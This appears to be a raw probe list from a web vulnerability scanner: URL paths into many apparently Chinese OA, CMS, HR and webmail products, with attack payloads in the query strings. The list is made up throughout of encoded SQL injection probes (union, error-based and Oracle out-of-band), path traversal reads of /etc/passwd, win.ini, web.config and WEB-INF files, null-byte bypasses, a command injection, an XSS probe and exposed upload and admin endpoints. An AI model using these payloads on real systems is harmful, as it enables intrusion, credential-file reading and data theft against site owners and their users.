/main/model/childcatalog/fileFind.do?fcode=00103&title=-111%25%27%20union%20all%20select%20null%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--&Submit=%CB%D1%CB%F7
/scrp/feedbackdetail.cfm?iSno=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
/poweb/CDHelp.jsp?ISOID=3'%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,char%28104%29%2bchar%28107%29%2bchar%2858%29%2bchar%2849%29%2bchar%2858%29%2bchar%2849%29%2bchar%2857%29%2bchar%2857%29%2bchar%2855%29,null,null,null%20%20--%20
/information/OA_InforList.asp
/information/OA_PingLun.asp?PLType=1&POAID=54'%20and+1=char(106)%20--
/information_manager/informationmanager_upload.jsp?upload=1&dispControl=null&saveControl=null
/public/jsp/multiuploadfile.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&photos=null
/public/jsp/smartUploadPic.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jspx,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0
/jdwz/qtpage/findAllPoint.jsp?dtcxlb=vcsfjg&point_name=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2CNULL--%20&vcsfjg=all
/jdwz/newsAction.do?flag=flag&NewsId=-12'%20union%20all%20select%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29,12,12,12,12,12,12,12,12--
/caigou/NoticeList.aspx?Type=%27%2b+(select+convert(int%2cCHAR(106)%2bCHAR(105)%2bCHAR(120))+FROM+syscolumns)+%2b%27
/MailExportDo.asp?dellist=-1234%29%20or%203438%3DCONVERT%28INT%2C%28SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2b%28SELECT%20%28CASE%20WHEN%20%288986%3D8986%29%20THEN%20CHAR%28105%29%20ELSE%20CHAR%2848%29%20END%29%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%29%29%20%20AND%20%281602%3D1602
/mailClassInfor.asp
/MessageInfoDis.asp?VOID=26%20and%201122%3DCONVERT%28INT%2C%28SELECT%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%29%29%20--
/Include/DepartmentSet_Right.aspx?BI_ID=1'%20and%20(select%2b(char(106)%2bchar(120)%2bchar(106)%2bchar(120)))%3E0--
/jcms/m_1_9/user/down.jsp?pathfile=../jcms/m_1_9/user/down.jsp
/tophp.asp
/Manage/CalendarMemo/event.ashx
/RuvarHRM/web_common/file_download.aspx?hr_file_storage_id=1')%20and%20(select%20char(106)%2bchar(106))%3E0--
/SysManage/bbsSet/BoardInfo.aspx?board_id=-1'%20and%20(select%20char(106)%2bchar(106))%3E0--&level=1
/SysManage/include/SelectUnderling.aspx?u_underling=(select%20char(106)%2bchar(106)))--'
/SysManage/MailSet/select_mail.aspx?corp_id=(select%20char(106)%2bchar(106))%20--
/workflow/OfficeFileDownload.aspx?filename=1'%20and%20(select%20char(106)%2bchar(106))%3E0%20--
/SysManage/get_department.aspx?corpID=char(106)%2bchar(106)
/SysManage/role_setting_new.aspx?id=char(106)%2bchar(106)
/resource/jpk/search.jsp?coursetype=0&applyyear=0&university=%CF%C3%C3%C5%B4%F3%D1%A7&subject1=0&subject2=0&name=%25%27%20AND%201122%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%28104%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2849%29%7C%7CCHR%2857%29%7C%7CCHR%2857%29%7C%7CCHR%2855%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%27
/oa/download_attach.aspx?attach_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
/SysManage/departmentset_corpshow.aspx?bi_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
/SysManage/role_show.aspx?role_id=char(106)%2bchar(106)
/lates/index.html?username=123%27%2f%2a%2a%2fand%2f%2a%2a%2f%28seleselectct%2f%2a%2a%2f1%2f%2a%2a%2ffrom%2f%2a%2a%2f%28selselectect%2f%2a%2a%2fcount%28%2a%29%2Cconcat%280x7c%2C0x7765627363616E3A693A66696E64%2C0x7c%2Cfloor%28rand%280%29%2a2%29%29x%2f%2a%2a%2ffrom%2f%2a%2a%2finformation_schema.tables%2f%2a%2a%2fgroup%2f%2a%2a%2fby%2f%2a%2a%2fx%29a%29%23
/kaoqin/JiaoYanDis.asp
/admin/accounts_list.aspx?u_department_id=1'%20and%20(char(106)%2bchar(106))%3E0--
/tj/list.aspx?typeid=1'%20and%20(char(106)%2bchar(106))%3E0--
/filemanage/FolderPower.aspx?folder=1'%20and%20(char(106)%2bchar(106))%3E0--
/OperationManage/ViewSecrecyGuestBookMessage.aspx?sn=-12'%20and%20(char(106)%2bchar(106))%3E0--&sp=amdin&oid=0&type=2
/Manage/CalendarMemo/load.ashx
/php/report/include/ldap.inc
/php/report/include/util.inc
/php/report/include/config.inc
/php/report/lastlogin_list_export.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
/user/storage_explore.php
/grad/admin/domain_logo.php
/user/storage_fold_explore.php
/php/mailaction1.php?action=x&index=1.2;echo+123456%3Ex1.txt
/user/send_queue/upload_addition.php
/php/report/search_lastlogin.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
/php/bill/list_userinfo.php?domain=site.org&ok=1&cp=1%20union%20select%20md5(1122),2,3,4,5%23
/grad/admin/admin_logo_upload.php
/common/codewidget.jsp?code=1'%20AND%201=char(106)%20--
/download.ashx?files=../web.config
/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise
/?question/search/%27%75nion%20select%201,2,3,4,5,6,7,8,md5(1122),10,11,12,13,14,15,16,17,18,19,20%23
/jcms/m_1_9/user/down.jsp?abspathfile=/etc/passwd
/Edit/ShowEdit.aspx?Dir=../../&OpenWords=TxtTagKey
/jis/manage/databak/showlog.jsp?path=../showlog.jsp
/download.jsp?path=UserFiles/../download.jsp
/tt/trade/register.asp?step=checkdup&checkname=ologinname&checkval=haha'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&pk=0
/zwgkinfo/DepartMentInfoList.aspx?CategoryNum=-12'/**/and/**/1=char(106)--&DeptCode=
/jis/interface/offer.jsp?flag=user
/jis/down.jsp?pathfile=./down.jsp%00.jpg
/MockLogin.aspx
/mobile/user.php?act=order_list
/seeyon/management/status.jsp
/api/download.ashx?fid=nUDWEgdorSH4j/+9GiQTlA==
/monitoring?part=web.xml
/?/s_tag/hehe%25%27%20union%20select%201,2,3,md5(1122),5,6,7%20from%20go_admin%23
/download.action?fullPath=./WEB-INF/web.xml
/jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig
/jis/update/update.jsp?fn_billstatus=U
/install/install.php
/public/minify.php?f=../ooxxooxxo/hehe.js
/admin/index.asp
/plus/outside.php?id=../template/default/style/yun_index.css%00
/productpic.aspx?id=100611)%20and%201=char(106)%20--
/jsp/util/file_download.jsp?filePath=../../../../../../../etc/passwd
/jsp/util/file_download.jsp?filePath=c:%5Cwindows%5Cwin.ini%00.xml
/jcms/m_5_5/m_5_5_3/import.jsp
/upload!uploadImg.action
/AuthReturn.aspx?APTokenResponse=a$8SOIYyiGVYBge5mdoY5nIeAueY7BixUtLdHqpy8o3RqM9hVnisaXAA==
/?do=index&mod=goods
/index.php/*123*/'union/**/select/**/1,2,3,4,5,6,7,8,md5(1122),10,11%23&action=getatlbyid
/cart.aspx?act=spikebuy&spikeid=3%20and%201=char(106)%2bchar(120)%20--
/webmail/client/mail/index.php?module=operate&action=down&file=./../../mainconfig.php
/MoreIndex.aspx?pkId=6434&kw=a'%20and%201=char(106)%20--&st=2&t=1
/RuvarHRM/web_include/select_baseinfo.aspx?bt_name=1')%20%20and%20(char(106)%2bchar(106))%3E0--
/Default.aspx?item=1)%20and%201=(char(106)%2bchar(106))%20--
/news/searchNewsAction.shtml?keywords='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
/zwfw/zwfwInfoAction!execute.shtml?action=5&sid='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
/news/newsInfoAction.shtml?infotype=-1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20and%20'at'='at
/client/checkuser.aspx?user=test'%20and%20char(106)%3E0--&pwd=1
/siteserver/userRole/modal_sendMail.aspx?From=User&UserNameCollection=test'+and+char(106)%2bchar(106)=0%20--
/admin/include/config.php?depth=../../templates/default/images/css/metinfo.css%00
/admin/login/login_check.php?depth=../../templates/default/images/css/metinfo.css%00&admin_index=1
/admin/system/lang/lang.func.php?depth=../../../public/js/public.js%00
/webusr/check.aspx?loginname=nosec'%20and%201=char(106)%2bchar(106)%20--%20
/plugins/phpdisk_client/client_sub.php?action=upload_file
/ExhibitionCenter.aspx?area=-12'%20and/**/1=char(106)/**/--
/SupplyList.aspx?parentid=88&classid=-12%20and/**/1=char(106)/**/%20--%20
/company/SearchProducts.aspx?id=115&keyname=ppp%25'%20and/**/1=char(106)/**/%20--%20
/Web/Login.aspx
/Web/KeySearch.aspx?searchid=1234
/portal/admin/setright.aspx?id=-1
/infolist.aspx?ClassId=5)%20and%201122=CONVERT(INT,(SELECT%20CHAR(84)%2bCHAR(97)%2bCHAR(105)%2bCHAR(87)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(103)%2bCHAR(111)%2bCHAR(58)%2bCHAR(104)%2bCHAR(111)%2bCHAR(109)%2bCHAR(101)))%20AND%20(1=1
/guestbook.aspx?do=show&id=1%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,char(106)%2bchar(106)%2bchar(108)%20--
/prog/filedown.php?pe_id=MQ==
/emlib4/system/DataSource/GetDataGridCtrlResult.aspx?_debug_=undefined
/emlib4/format/release/aspx/eml_userwh.aspx
/voteresult.aspx?activeid=-1%20UNION%20SELECT%201,char(106)%2bchar(106),3,4,5%20from%20syscolumns%20--
/kbase_list.aspx?kcatid=1%20UNION%20SELECT%201,2,char(106)%2bchar(106),4,5,6,7,8%20from%20syscolumns--
/getTopLinksPortalCategoriesAction.action?siteId=../../../../../../../../../../windows/win.ini%00.jpg
/letter/letter_detail.aspx?id=8'%20%20and+1=char(106)%2bchar(106)%20--
/cms/infopub/rss.jsp?channelcode=-A%27%20union%20all%20select%20char%28106%29%2bchar%28106%29%2Cnull%2Cnull%2Cnull%20--&maxnum=20
/web/doc_hit.jsp?documentid=-21%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
/OperationManage/BlogMoreIndex.aspx?pkId=&blogId=1&kw=abc'%20and%201=char(106)%20--&st=1&t=1
/Tools/stream/FlvStream.ashx?file=./Index.aspx
/tj/total.aspx?act=other&typeid=1%27%20AND%209518%3DCONVERT%28INT%2C%28SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2b%28SELECT%20%28CASE%20WHEN%20%289518%3D9518%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2bCHAR%28100%29%29%29%29%20AND%20%27xhJK%27%3D%27xhJK
/webConfigSet/configSetting.aspx?url=/login/index.aspx
/cms/cms/infopub/gjjs.jsp?pubtype=S&pubpath=dkt&startdate=&enddate=&topic=&content=&authorname=&origin=&description=&webappcode=A02&searchdir=A02&templetid=-21'%20union%20all%20select%20char(106)%2bchar(62)%2bchar(60),null,null%20--
/mydocument/download.aspx
/prog/get_passwd_1.php?user=hehe%3Cscript%3Ealert(42873)%3C/script%3E%20
/cjwtlist.aspx?t=(select+convert(int%2c@@version))
/FormBuilder/PrintFormList.aspx?file_id=1)/**/UNION/**/ALL/**/SELECT/**/CHR(97)%7C%7CCHR(60)%7C%7CCHR(99),NULL/**/FROM/**/DUAL/**/--
/module/sitesearch/index.jsp?keyword=&columnid=-1650)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&keyvalue=&webid=&currpage=2
/FormBuilder/yjzxList.aspx?id=1/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,CHR(106)%7C%7CCHR(60)%7C%7CCHR(106)/**/FROM/**/DUAL--
/FromBaoShan/LaborSpecial/PlacardView.aspx?info_id=1/**/UNION/**/ALL/**/SELECT/**/CHR(106)%7C%7CCHR(106)%7C%7CCHR(106),NULL,NULL,NULL/**/FROM/**/DUAL--
/goods/GoodsAdd.aspx?goodsid=1/**/AND/**/1122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&flag=2
/pub/search/search_video_view.asp?id=3&mid=4%20and%201122=CONVERT(INT,(SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29))&yh=1
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/main/findgbm2.asp?sql=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name&sqlbak=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name%20&px=
/ebsys/fceform/common/djframe.htm?isfile=release&djsn=eb_runsql
/nameedit.asp?table=bbs&id=1%20union%20all%20select%20null,null,null,null,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),null%20--&action=edit
/jis/front/sdgs/updateuser.jsp
/lm/down.jsp?pathfile=down.jsp
/website/dflz/dflzCjAction!caiwugk_list.action?orgCode=&orgName=&zuOrgCode=&zuOrgName=&cwgkbbh=-21'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--%20&cwgkbmc=
/Documents/FolderInfor.asp?POAID=0'%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
/Documents/FolderInfor.asp?OAID=0%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
/meetingroom/MeetingRoom_UseInfo.asp
/lm/front/api/opr_datacall.jsp?fn_billstatus=E&vc_id=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL--
/downloadFile.action?path=index.jsp
/portal/getJsonData.action?userId=9090&ruleID=portal-common.getProFileInfo
/lm/front/noontimelist.jsp?flag=a&start=1&end=2&sysid=2'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL%20FROM%20DUAL%20--&groupid=4
/php/bill/print_addfeelog.php
/objectbox/selectx_userlist.jsp?fn_Keywords=1'%20UNION%20ALL%20SELECT%20NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL--%20&perm=&cPage=1&tiao=
/meetingroom/ShenQingInforDis.asp?OAID=-12%20AND%201993%20IN%20(char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100))%20---
/information/oa_infordislist.asp?class=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
/information/OA_Condition.asp?class=1&subclass=(CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))))---
/message/mytreedata.asp?bumenid=-12%20AND%201432=CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)))--%20&time=&time=
/house/upload/upload.asp
/sbweb/Upload_Save_2.asp
/feReport/chartList.jsp?delId=1&reportId=1%20and%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--
/jsearch/admin/opr_forcechangepwd.jsp
/home/front/search/opr_chatsearch.jsp?action=simplesearch&words=1%25%27%20union%20all%20select%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20DUAL%20--
/celive/live/index.php?action=1
/admin/Site/AddDomain.aspx?Edit=1&id=1000/**/%20/**/union/**/%20/**/all/**/%20/**//**/SELECT/**/%200,/**/CHAR(106)%2bCHAR(106)%2bCHAR(106),0,0,'',0,2014,0/**/FROM/**/%20ZL_Manager
/baseNews_view.jsp?newsId=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--
/Lesktop/command.aspx
/Lesktop/Management/DeptEdit.aspx?did=1%20and%20char(106)%3E0
/Lesktop/sendfile.aspx
/Office_Supplies/Goods_Main.aspx?type=1&info_id=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/Personnel/Infomation.aspx?userid=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/Personnel/VacationComputation.aspx?id=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/RCMANAGE_New/rcgl.aspx?UID=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/ObjSwitch/HYTZ.aspx?userid=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/modules/pdflist.aspx?info_id=1/**/union/**/all/**/select/**/null,null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),null,null,null/**/from/**/dual%20--
/jcms/m_5_e/init/sitesearch/opr_classajax.jsp?classid=1%20union%20all%20select%2012,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20from%20dual%20--
/lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,md5(1122),0x7e),NULL,NULL,NULL,NULL
/lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL%23
/jcms/jcms_files/jcms1/web2/site/module/comment/opr_readfile.jsp?filename=opr_readfile.jsp
/managerNManager.action
/lm/manage/opr_setappraisal.jsp?fn_billstatus=E&vc_setapprid=-2087%20UNION%20ALL%20SELECT%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL%20FROM%20DUAL--
